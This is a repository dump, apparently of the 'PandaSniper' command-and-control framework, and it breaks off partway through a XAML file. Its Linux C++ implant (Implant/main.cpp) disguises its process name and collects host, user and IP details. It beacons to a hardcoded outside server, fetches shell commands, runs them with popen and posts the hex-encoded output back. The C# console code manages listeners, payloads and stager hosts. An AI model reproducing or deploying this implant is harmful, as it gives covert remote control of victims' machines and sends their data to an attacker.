6 | zrK7wz7Ny+0xy5tAyLzFVN3kQXHDiWyOkxKHoJMuNQRja5NiowQ3rtZ91B/SR6GZ 7 | XMxhpgoq8z2CBfE80mtUeIwNEoCNAgMBAAGjUjBQMA4GA1UdDwEB/wQEAwIChDAd 8 | BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDwYDVR0TAQH/BAUwAwEB/zAO 9 | BgNVHQ4EBwQFAQIDBAUwDQYJKoZIhvcNAQELBQADgYEAvdYniOY+ydbuKmruihKL 10 | dBShBnepDznHTXXgQ5+Kf2p7mhFlQuetPhupb00OvN2Iz1AJFSulLF9fQz6P4Dui 11 | HhaEWLlu9dFHnEA/P4okixqFUZK00RkA9O7z4Lo29083eUFZBmTqAysuzsLBcndu 12 | Usi0/QV2wu8b+nVGVhS7YBU= 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /Implant/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/Implant/.DS_Store -------------------------------------------------------------------------------- /Implant/main.cpp: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | 4 | #define PROC_NAME "testprocess" 伪造的进程名字 5 | int Heartbeat_time = 2; //心跳时间 6 | 7 | apt-get install libcurl4-gnutls-dev 8 | gcc main.cpp -lcurl -lstdc++ -lpthread 9 | 10 | */ 11 | 12 | 13 | 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include 22 | #include 23 | 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | 30 | #include //多线程 31 | #include //队列 32 | #include //uname 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | std::queue worker_queue; //任务队列 39 | 40 | 41 | #define MAXLINE 102400 42 | 43 | char infotype[MAXLINE] = "0"; 44 | char cmdtype[MAXLINE] = "1"; 45 | 46 | #define PROC_NAME "testprocess" 47 | char serverip[MAXLINE] = "http://116.62.132.31:8081"; 48 | //char serverip[MAXLINE] = "http://127.0.0.1"; 49 | int Heartbeat_time = 5; //心跳时间默认5s 50 | 51 | 52 | 53 | 54 | //获取内网ip 55 | int getip(char ip[1024]) { 56 | struct ifaddrs* ifAddrStruct = NULL; 57 | struct ifaddrs* ifa = NULL; 58 | void* tmpAddrPtr = NULL; 59 | 60 | getifaddrs(&ifAddrStruct); 61 | 62 | for (ifa = ifAddrStruct; ifa != NULL; ifa = ifa->ifa_next) { 63 | if (!ifa->ifa_addr) { 64 | continue; 65 | } 66 | if (ifa->ifa_addr->sa_family == AF_INET) { // check it is IP4 67 | // is a valid IP4 Address 68 | tmpAddrPtr = &((struct sockaddr_in*)ifa->ifa_addr)->sin_addr; 69 | char addressBuffer[INET_ADDRSTRLEN]; 70 | 71 | inet_ntop(AF_INET, tmpAddrPtr, addressBuffer, INET_ADDRSTRLEN); 72 | 73 | char f[MAXLINE];//过滤 74 | sprintf(f, "127.0.0.1"); 75 | 76 | if (strcmp(addressBuffer, f) == 0) {//如果是127.0.0.1就跳过 77 | continue; 78 | } 79 | sprintf(ip, addressBuffer); 80 | return 0; 81 | } 82 | 83 | 84 | } 85 | return 0; 86 | } 87 | 88 | 89 | std::string string_to_hex(const std::string& input) 90 | { 91 | static const char hex_digits[] = "0123456789ABCDEF"; 92 | 93 | std::string output; 94 | output.reserve(input.length() * 2); 95 | for (unsigned char c : input) 96 | { 97 | output.push_back(hex_digits[c >> 4]); 98 | output.push_back(hex_digits[c & 15]); 99 | } 100 | return output; 101 | } 102 | 103 | int _getuid() { 104 | srand(time(0)); 105 | int uid; 106 | uid = rand(); 107 | return uid; 108 | } 109 | 110 | int uid = _getuid(); 111 | 112 | 113 | 114 | //去掉首尾空格 115 | std::string trimstr(std::string s) { 116 | size_t n = s.find_last_not_of(" \r\n\t"); 117 | if (n != std::string::npos) { 118 | s.erase(n + 1, s.size() - n); 119 | } 120 | n = s.find_first_not_of(" \r\n\t"); 121 | if (n != std::string::npos) { 122 | s.erase(0, n); 123 | } 124 | return s; 125 | } 126 | 127 | 128 | //执行命令函数 129 | int cmd_exec(char *cmd,char *result) { 130 | 131 | FILE* stream; 132 | char buf[MAXLINE]; 133 | 134 | memset(buf, '\0', sizeof(buf)); 135 | stream = popen(cmd, "r"); 136 | 137 | fread(buf, sizeof(char), sizeof(buf), stream); 138 | 139 | 140 | sprintf(result, "%s",buf); 141 | 142 | pclose(stream); 143 | 144 | 145 | return 1; 146 | } 147 | 148 | 149 | //curl的指针回调 150 | size_t WriteCallback(char* contents, size_t size, size_t nmemb, void* userp) 151 | { 152 | ((std::string*)userp)->append((char*)contents, size * nmemb); 153 | return size * nmemb; 154 | } 155 | 156 | 157 | 158 | //获取http响应 159 | int get_response(char* server,char* uri,char* send_postdata,char* recv_data) { 160 | 161 | printf("[send] %s\n", send_postdata); 162 | curl_global_init(CURL_GLOBAL_ALL); 163 | 164 | CURL* easyhandle = curl_easy_init(); 165 | std::string readBuffer; 166 | 167 | char url[MAXLINE]; 168 | sprintf(url, "%s%s", server, uri); 169 | 170 | printf("request url %s\n", url); 171 | 172 | curl_easy_setopt(easyhandle, CURLOPT_URL, url); 173 | /*设置超时时间10秒*/ 174 | curl_easy_setopt(easyhandle, CURLOPT_TIMEOUT, 10L); 175 | /* 指定POST数据 */ 176 | curl_easy_setopt(easyhandle, CURLOPT_POSTFIELDS, send_postdata); 177 | curl_easy_setopt(easyhandle, CURLOPT_VERBOSE, 0L); 178 | curl_easy_setopt(easyhandle, CURLOPT_WRITEFUNCTION, WriteCallback); 179 | curl_easy_setopt(easyhandle, CURLOPT_WRITEDATA, &readBuffer); 180 | 181 | curl_easy_perform(easyhandle); 182 | readBuffer = trimstr(readBuffer);//去掉http响应首尾空格 183 | char* http_response = (char*)readBuffer.data(); 184 | 185 | 186 | sprintf(recv_data, "%s",http_response); 187 | 188 | printf("[recv] %s\n\n", recv_data); 189 | return 0; 190 | } 191 | 192 | 193 | //发送心跳 接收指令 194 | int Heartbeat(char* info) { 195 | 196 | while (true) 197 | { 198 | char type[1024]; 199 | // printf("Http Send request -> %s\n", info); 200 | get_response(serverip,(char *)"/status",info, type); 201 | 202 | 203 | if (strcmp(infotype,type)==0) {// type 0 进 info 204 | char cmd[MAXLINE]; 205 | printf("go to info [%s]\n", type); 206 | get_response(serverip,(char*)"/info", info, cmd);//拿到响应 207 | //printf("Get cmd -> %s\n\n\n", cmd); 208 | 209 | } 210 | else if (strcmp(cmdtype, type) == 0) { 211 | printf("go to cmd [%s]\n", type); 212 | char cmd[MAXLINE]; 213 | get_response(serverip,(char*)"/cmd", info, cmd);//拿到响应 214 | //printf("Get cmd -> %s\n\n\n", cmd); 215 | worker_queue.push(cmd); 216 | } 217 | 218 | sprintf(type, "999"); 219 | 220 | sleep(Heartbeat_time); 221 | 222 | } 223 | return 0; 224 | } 225 | 226 | //执行队列任务 227 | int exec_work() { 228 | 229 | while (true) 230 | { 231 | 232 | char* text_queue; 233 | if (!worker_queue.empty()) { 234 | text_queue = worker_queue.front();//访问队首元素,如例:q.front(),即最早被压入队列的元素。 235 | worker_queue.pop();//弹出队列的第一个元素 236 | 237 | 238 | //printf("Queue %s\n", text_queue); 239 | //执行命令获取结果 240 | char cmd_result[102400]; 241 | 242 | cmd_exec(text_queue, cmd_result); 243 | 244 | //去掉命令结果的换行符并转为hex 245 | std::string tmp1= cmd_result; 246 | tmp1 = string_to_hex(tmp1); 247 | char* cmd_result1= (char*)tmp1.data(); 248 | 249 | 250 | char cmd_postdata[MAXLINE]; 251 | 252 | sprintf(cmd_postdata, "{\"uid\":\"%d\",\"result\":\"%s\"}", uid,cmd_result1); 253 | 254 | //发送命令结果 255 | char step_3_res[MAXLINE];//无意义 只是为了格式化 256 | get_response(serverip,(char*)"/cmdResult", cmd_postdata, step_3_res); 257 | 258 | 259 | } 260 | sleep(0.1);//每隔0.1s查看任务队列是否为空 261 | } 262 | 263 | 264 | return 0; 265 | } 266 | 267 | 268 | //替换字符串 269 | void findAndReplaceAll(std::string& data, std::string toSearch, std::string replaceStr) 270 | { 271 | // Get the first occurrence 272 | size_t pos = data.find(toSearch); 273 | 274 | // Repeat till end is reached 275 | while (pos != std::string::npos) 276 | { 277 | // Replace this occurrence of Sub String 278 | data.replace(pos, toSearch.size(), replaceStr); 279 | // Get the next occurrence from the current position 280 | pos = data.find(toSearch, pos + replaceStr.size()); 281 | } 282 | } 283 | 284 | int main(int argc, char** argv) 285 | { 286 | 287 | // 288 | struct utsname u; 289 | uname(&u); 290 | 291 | char osinfo[1024]; 292 | char cpuinfo[1024]; 293 | sprintf(osinfo, "%s %s %s ",u.sysname, u.nodename, u.release); 294 | sprintf(cpuinfo, "%s", u.machine); 295 | 296 | 297 | 298 | //修改进程名 299 | memset((void*)argv[0], '\0', strlen(argv[0])); 300 | strcpy(argv[0], PROC_NAME); 301 | 302 | char inter_ip[1024]; 303 | getip(inter_ip); 304 | 305 | 306 | //基本信息获取 307 | int pid = getpid(); 308 | char hostname[1024]; 309 | gethostname(hostname, 1024); 310 | 311 | char* current_user; 312 | current_user = getlogin(); 313 | 314 | char ip_json[1024]; 315 | get_response((char*)"https://api.myip.com",(char*)"", (char*)"", (char *)ip_json);//获取外网ip 316 | 317 | std::string ip = ip_json; 318 | findAndReplaceAll(ip, "\"","\\\""); 319 | sprintf(ip_json, (char*)ip.data()); 320 | 321 | char basic_information[MAXLINE]; 322 | 323 | 324 | //拼接基础信息 325 | sprintf(basic_information, "{\"uid\":\"%d\",\"data\":\"{\\\"hostname\\\":\\\"%s\\\",\\\"user\\\":\\\"%s\\\",\\\"cpuinfo\\\":\\\"%s\\\",\\\"osinfo\\\":\\\"%s\\\",\\\"pid\\\":\\\"%d\\\",\\\"sleep_time\\\":\\\"%d\\\"}\",\"ip\":\"%s\",\"inner_ip\":\"%s\"}", uid, hostname, current_user,cpuinfo,osinfo, pid, Heartbeat_time, ip_json, inter_ip); 326 | 327 | 328 | 329 | //发送心跳 接收指令到队列 330 | std::thread threadObj1(Heartbeat, basic_information); 331 | threadObj1.detach();//并发 332 | 333 | 334 | std::thread threadObj2(exec_work); 335 | threadObj2.join(); 336 | return 0; 337 | } -------------------------------------------------------------------------------- /Master/PandaSniper.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29613.14 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PandaSniper", "PandaSniper\PandaSniper.csproj", "{6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MasterTest", "..\MasterTest\MasterTest.csproj", "{7312A575-6082-4625-8C95-3E3DAF1E51CC}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 21 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Debug|Any CPU.Build.0 = Debug|Any CPU 22 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {7312A575-6082-4625-8C95-3E3DAF1E51CC}.Release|Any CPU.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {691F221C-2380-4008-BCE8-621BFC771CCF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Master/PandaSniper/AddListener.xaml.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using Newtonsoft.Json.Linq; 3 | using System; 4 | using System.Collections.Generic; 5 | using System.Collections.ObjectModel; 6 | using System.Linq; 7 | using System.Net.Security; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Windows; 11 | using System.Windows.Controls; 12 | using System.Windows.Data; 13 | using System.Windows.Documents; 14 | using System.Windows.Input; 15 | using System.Windows.Media; 16 | using System.Windows.Media.Imaging; 17 | using System.Windows.Shapes; 18 | 19 | namespace PandaSniper 20 | { 21 | /// 22 | /// AddListener.xaml 的交互逻辑 23 | /// 24 | public partial class AddListener : Window 25 | { 26 | 27 | public ObservableCollection listeners; 28 | public delegate void TransfDelegate(ObservableCollection listeners); 29 | public UserProfile userProfile; 30 | 31 | public event TransfDelegate TransfEvent; 32 | 33 | public AddListener() 34 | { 35 | InitializeComponent(); 36 | } 37 | 38 | private void AddListenerWindow_Loaded(object sender, RoutedEventArgs e) 39 | { 40 | 41 | } 42 | 43 | private void WindowTitle_MouseMove(object sender, MouseEventArgs e) 44 | { 45 | if (e.LeftButton == MouseButtonState.Pressed) 46 | { 47 | this.DragMove(); 48 | } 49 | } 50 | private void WindowClose_MouseEnter(object sender, MouseEventArgs e) 51 | { 52 | 53 | this.WindowCloseIcon.Visibility = Visibility.Visible; 54 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 55 | } 56 | private void WindowClose_MouseLeave(object sender, MouseEventArgs e) 57 | { 58 | 59 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 60 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 61 | } 62 | private void WindowMinSize_MouseEnter(object sender, MouseEventArgs e) 63 | { 64 | 65 | this.WindowCloseIcon.Visibility = Visibility.Visible; 66 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 67 | } 68 | private void WindowMinSize_MouseLeave(object sender, MouseEventArgs e) 69 | { 70 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 71 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 72 | } 73 | private void WindowMaxSize_MouseEnter(object sender, MouseEventArgs e) 74 | { 75 | 76 | this.WindowCloseIcon.Visibility = Visibility.Visible; 77 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 78 | } 79 | private void WindowMaxSize_MouseLeave(object sender, MouseEventArgs e) 80 | { 81 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 82 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 83 | } 84 | private void WindowClose_Click(object sender, RoutedEventArgs e) 85 | { 86 | this.Close(); 87 | } 88 | private void WindowMinSize_Click(object sender, RoutedEventArgs e) 89 | { 90 | this.WindowState = WindowState.Minimized; 91 | } 92 | 93 | 94 | private void HttpHostsListBox_PreviewMouseUp(object sender, MouseButtonEventArgs e) 95 | { 96 | 97 | } 98 | 99 | private void AddListenerSave_MouseEnter(object sender, MouseEventArgs e) 100 | { 101 | 102 | } 103 | 104 | private void AddListenerSave_MouseLeave(object sender, MouseEventArgs e) 105 | { 106 | 107 | } 108 | 109 | private void AddListenerSave_Click(object sender, RoutedEventArgs e) 110 | { 111 | string hosts = ""; 112 | foreach (ListBoxItem listBoxItem in HttpHostsListBox.Items) 113 | { 114 | if(hosts == "") 115 | { 116 | hosts = listBoxItem.DataContext.ToString(); 117 | } 118 | else 119 | { 120 | hosts = hosts + "," + listBoxItem.DataContext.ToString(); 121 | } 122 | 123 | } 124 | ListenersListView listener = new ListenersListView 125 | { 126 | name = ListenerName.Text, 127 | payload = ListenerPayload.Text, 128 | hosts = hosts, 129 | stagerHost = HttpHostStager.Text, 130 | port = HttpPortC2.Text, 131 | bindto = HttpPortBind.Text, 132 | header = HttpHostHeader.Text, 133 | proxy = HttpProxy.Text, 134 | profile = ListenerProfile.Text 135 | }; 136 | 137 | if ("" == listener.name) 138 | { 139 | MessageBox.Show("name is empty"); 140 | return; 141 | } 142 | else if ("" == listener.port) 143 | { 144 | MessageBox.Show("port is empty"); 145 | return; 146 | } 147 | 148 | bool isE = false; 149 | foreach (ListenersListView listenerFormat in this.listeners) 150 | { 151 | if (listenerFormat.name == listener.name) 152 | { 153 | MessageBox.Show("name is exits"); 154 | return; 155 | } 156 | else if (listenerFormat.port == listener.port) 157 | { 158 | MessageBox.Show("port is exits"); 159 | return; 160 | } 161 | else 162 | { 163 | isE = true; 164 | } 165 | } 166 | if (this.listeners.Count == 0 || isE) 167 | { 168 | this.listeners.Add(listener); 169 | DataFormat MessageData; 170 | MessageData.type = "3"; 171 | MessageData.token = userProfile.token; 172 | MessageData.data = new Dictionary { { "port", listener.Port } }; 173 | string sendMessage = JsonConvert.SerializeObject(MessageData); 174 | SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost"); 175 | sslTcpClient.StartSslTcp(); 176 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 177 | sslTcpClient.ReadMessage(sslStream); 178 | 179 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 180 | if (rMJson["code"].ToString() == "200") 181 | { 182 | MessageBox.Show("监听成功"); 183 | } 184 | else 185 | { 186 | MessageBox.Show(rMJson["error"].ToString()); 187 | sslTcpClient.CloseSslTcp(); 188 | return; 189 | } 190 | sslTcpClient.CloseSslTcp(); 191 | } 192 | 193 | this.TransfEvent(this.listeners);//触发事件 194 | this.Close(); 195 | } 196 | 197 | private void AddListenerClose_MouseEnter(object sender, MouseEventArgs e) 198 | { 199 | 200 | } 201 | 202 | private void AddListenerClose_MouseLeave(object sender, MouseEventArgs e) 203 | { 204 | 205 | } 206 | 207 | private void AddListenerClose_Click(object sender, RoutedEventArgs e) 208 | { 209 | this.Close(); 210 | } 211 | 212 | private void AddHttpHost_MouseEnter(object sender, MouseEventArgs e) 213 | { 214 | 215 | } 216 | 217 | private void AddHttpHost_MouseLeave(object sender, MouseEventArgs e) 218 | { 219 | 220 | } 221 | 222 | private void AddHttpHost_Click(object sender, RoutedEventArgs e) 223 | { 224 | 225 | } 226 | 227 | private void RemoveHttpHost_MouseEnter(object sender, MouseEventArgs e) 228 | { 229 | 230 | } 231 | 232 | private void RemoveHttpHost_MouseLeave(object sender, MouseEventArgs e) 233 | { 234 | 235 | } 236 | 237 | private void RemoveHttpHost_Click(object sender, RoutedEventArgs e) 238 | { 239 | 240 | } 241 | 242 | private void AddHttpProxy_MouseEnter(object sender, MouseEventArgs e) 243 | { 244 | 245 | } 246 | 247 | private void AddHttpProxy_MouseLeave(object sender, MouseEventArgs e) 248 | { 249 | 250 | } 251 | 252 | private void AddHttpProxy_Click(object sender, RoutedEventArgs e) 253 | { 254 | 255 | } 256 | } 257 | } 258 | -------------------------------------------------------------------------------- /Master/PandaSniper/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Master/PandaSniper/App.xaml: -------------------------------------------------------------------------------- 1 |  6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Master/PandaSniper/App.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Configuration; 4 | using System.Data; 5 | using System.Linq; 6 | using System.Threading.Tasks; 7 | using System.Windows; 8 | 9 | namespace PandaSniper 10 | { 11 | /// 12 | /// App.xaml 的交互逻辑 13 | /// 14 | public partial class App : Application 15 | { 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /Master/PandaSniper/DataFormat.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace PandaSniper 8 | { 9 | public struct DataFormat 10 | { 11 | public string type; 12 | public string token; 13 | public Dictionary data; 14 | } 15 | 16 | public struct ConfigFormat 17 | { 18 | public string id; 19 | public string ip; 20 | public DataConfigFormat data; 21 | } 22 | 23 | public struct DataConfigFormat 24 | { 25 | public string host; 26 | public string port; 27 | public string user; 28 | public string password; 29 | } 30 | 31 | public struct UserProfile 32 | { 33 | public string token; 34 | public string user; 35 | public string host; 36 | public string port; 37 | public string password; 38 | public SslTcpClient sslTcpClient; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /Master/PandaSniper/DoubleBufferListView.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Reflection; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Windows.Controls; 8 | 9 | namespace PandaSniper 10 | { 11 | 12 | public static class DoubleBufferListView 13 | { 14 | /// 15 | /// 双缓冲,解决闪烁问题 16 | /// 17 | /// 18 | /// 19 | public static void DoubleBufferedListView(this ListView lv, bool flag) 20 | { 21 | Type lvType = lv.GetType(); 22 | PropertyInfo pi = lvType.GetProperty("DoubleBuffered", 23 | BindingFlags.Instance | BindingFlags.NonPublic); 24 | pi.SetValue(lv, flag, null); 25 | } 26 | 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/Function.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace PandaSniper 8 | { 9 | public class Function 10 | { 11 | public static DateTime GetDateTime(string timeStamp) 12 | { 13 | DateTime dtStart = TimeZone.CurrentTimeZone.ToLocalTime(new DateTime(1970, 1, 1)); 14 | long lTime = long.Parse(timeStamp + "0000000"); 15 | TimeSpan toNow = new TimeSpan(lTime); 16 | return dtStart.Add(toNow); 17 | } 18 | 19 | private static char[] constant = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' }; 20 | /// 21 | /// 生成0-z的随机字符串 22 | /// 23 | /// 字符串长度 24 | /// 随机字符串 25 | public static string GenerateRandomString(int length) 26 | { 27 | string checkCode = String.Empty; 28 | Random rd = new Random(); 29 | for (int i = 0; i < length; i++) 30 | { 31 | checkCode += constant[rd.Next(36)].ToString(); 32 | } 33 | return checkCode; 34 | } 35 | 36 | public static string GetChsFromHex(string hex) 37 | { 38 | 39 | if (hex.Length % 2 != 0) 40 | { 41 | hex += "20";//空格 42 | //throw new ArgumentException("hex is not a valid number!", "hex"); 43 | } 44 | 45 | // 需要将 hex 转换成 byte 数组。 46 | byte[] bytes = new byte[hex.Length / 2]; 47 | 48 | for (int i = 0; i < bytes.Length; i++) 49 | { 50 | try 51 | { 52 | // 每两个字符是一个 byte。 53 | bytes[i] = byte.Parse(hex.Substring(i * 2, 2), 54 | System.Globalization.NumberStyles.HexNumber); 55 | } 56 | catch 57 | { 58 | // Rethrow an exception with custom message. 59 | throw new ArgumentException("hex is not a valid hex number!", "hex"); 60 | } 61 | } 62 | 63 | // 获得 GB2312,Chinese Simplified。 64 | Encoding chs = System.Text.Encoding.GetEncoding("UTF-8"); 65 | 66 | return chs.GetString(bytes); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutable.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 29 | 30 | Linux Executable 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutable.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// LinuxExecutable.xaml 的交互逻辑 20 | /// 21 | public partial class LinuxExecutable : Page 22 | { 23 | public LinuxExecutable() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutableS.xaml: -------------------------------------------------------------------------------- 1 |  10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Master/PandaSniper/LinuxExecutableS.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// LinuxExecutableS.xaml 的交互逻辑 20 | /// 21 | public partial class LinuxExecutableS : Page 22 | { 23 | public LinuxExecutableS() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/ListenersListView.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace PandaSniper 9 | { 10 | public class ListenersListView : INotifyPropertyChanged 11 | { 12 | public string name; 13 | public string payload; 14 | public string hosts; 15 | public string stagerHost; 16 | public string port; 17 | public string bindto; 18 | public string profile; 19 | public string header; 20 | public string proxy; 21 | public event PropertyChangedEventHandler PropertyChanged; 22 | 23 | public string Name 24 | { 25 | get 26 | { 27 | return name; 28 | } 29 | set 30 | { 31 | name = value; 32 | if (this.PropertyChanged != null) 33 | { 34 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Name")); 35 | } 36 | } 37 | } 38 | public string Payload 39 | { 40 | get 41 | { 42 | return payload; 43 | } 44 | set 45 | { 46 | payload = value; 47 | if (this.PropertyChanged != null) 48 | { 49 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Payload")); 50 | } 51 | } 52 | } 53 | public string Hosts 54 | { 55 | get 56 | { 57 | return hosts; 58 | } 59 | set 60 | { 61 | hosts = value; 62 | if (this.PropertyChanged != null) 63 | { 64 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Hosts")); 65 | } 66 | } 67 | } 68 | public string StagerHost 69 | { 70 | get 71 | { 72 | return stagerHost; 73 | } 74 | set 75 | { 76 | stagerHost = value; 77 | if (this.PropertyChanged != null) 78 | { 79 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("StagerHost")); 80 | } 81 | } 82 | } 83 | public string Port 84 | { 85 | get 86 | { 87 | return port; 88 | } 89 | set 90 | { 91 | port = value; 92 | if (this.PropertyChanged != null) 93 | { 94 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Port")); 95 | } 96 | } 97 | } 98 | public string BindTo 99 | { 100 | get 101 | { 102 | return bindto; 103 | } 104 | set 105 | { 106 | bindto = value; 107 | if (this.PropertyChanged != null) 108 | { 109 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("BindTo")); 110 | } 111 | } 112 | } 113 | public string Profile 114 | { 115 | get 116 | { 117 | return profile; 118 | } 119 | set 120 | { 121 | profile = value; 122 | if (this.PropertyChanged != null) 123 | { 124 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Profile")); 125 | } 126 | } 127 | } 128 | public string Header 129 | { 130 | get 131 | { 132 | return header; 133 | } 134 | set 135 | { 136 | header = value; 137 | if (this.PropertyChanged != null) 138 | { 139 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Header")); 140 | } 141 | } 142 | } 143 | 144 | public string Proxy 145 | { 146 | get 147 | { 148 | return proxy; 149 | } 150 | set 151 | { 152 | proxy = value; 153 | if (this.PropertyChanged != null) 154 | { 155 | this.PropertyChanged.Invoke(this, new PropertyChangedEventArgs("Proxy")); 156 | } 157 | } 158 | } 159 | 160 | public ListenersListView() { } 161 | public ListenersListView( 162 | string name, 163 | string payload, 164 | string hosts, 165 | string stagerHost, 166 | string port, 167 | string bindto, 168 | string profile, 169 | string header, 170 | string proxy) 171 | { 172 | this.name = name; 173 | this.payload = payload; 174 | this.hosts = hosts; 175 | this.stagerHost = stagerHost; 176 | this.port = port; 177 | this.bindto = bindto; 178 | this.profile = profile; 179 | this.header = header; 180 | this.proxy = proxy; 181 | } 182 | } 183 | } 184 | -------------------------------------------------------------------------------- /Master/PandaSniper/LoginWindow.xaml: -------------------------------------------------------------------------------- 1 |  22 | 23 | 24 | 25 | 26 | 27 | 28 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 55 | 56 | 57 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 114 | 117 | 123 | 132 | 133 | 136 | 142 | 151 | 152 | 155 | 161 